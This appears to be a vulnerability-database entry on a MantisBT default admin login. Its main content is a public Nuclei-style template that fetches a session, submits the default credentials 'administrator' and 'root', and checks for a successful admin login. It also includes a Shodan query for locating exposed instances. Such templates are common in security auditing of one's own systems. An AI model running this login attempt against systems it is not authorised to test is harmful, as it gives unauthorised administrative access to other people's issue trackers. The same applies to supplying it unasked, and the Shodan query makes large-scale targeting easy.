mantisbt-default-credential: MantisBT Default Admin Login

Date: 2025-08-01 | Affected software: MantisBT | PoC: public

Vulnerability description

A MantisBT default admin login was discovered.

PoC code [public]

id: mantisbt-default-credential

info:
  name: MantisBT Default Admin Login
  author: For3stCo1d,YashVardhanTripathi
  severity: high
  description: A MantisBT default admin login was discovered.
  reference:
    - https://mantisbt.org/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
    cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    shodan-query: title:"MantisBT"
    product: mantisbt
    vendor: mantisbt
  tags: mantisbt,default-login,vuln

http:
  - raw:
      - |
        GET /login_password_page.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /login_password_page.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: MANTIS_secure_session=1; PHPSESSID={{session}}
        Content-Type: application/x-www-form-urlencoded

        return=index.php&username={{username}}
      - |
        POST /login_password_page.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: MANTIS_secure_session=1; PHPSESSID={{session}}

        return=index.php&username={{username}}&password={{password}}&secure_session=on
      - |
        GET /my_view_page.php HTTP/1.1
        Host: {{Hostname}}

    attack: pitchfork
    payloads:
      username:
        - administrator
      password:
        - root

    matchers-condition: and
    matchers:
      - type: word
        part: body_4
        words:
          - "View Issues"
          - "Change Log"
        condition: and

      - type: regex
        part: header_3
        regex:
          - "Location: .*?/login_cookie_test.php\\?return=account_page.php"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: session
        internal: true
        group: 1
        part: header
        regex:
          - "PHPSESSID=([a-zA-Z0-9]+);"
# digest: 490a0046304402205ec41199664dd311074ac83b22ff6367ebf9de3911c072c82ecd718dc72baeed02205ab9ce1ab4a28f020def4dbda9a0931ab6e39337e20f68c4ccc811ba5a3e340d:922c64590222798bb761d5b6d8e72950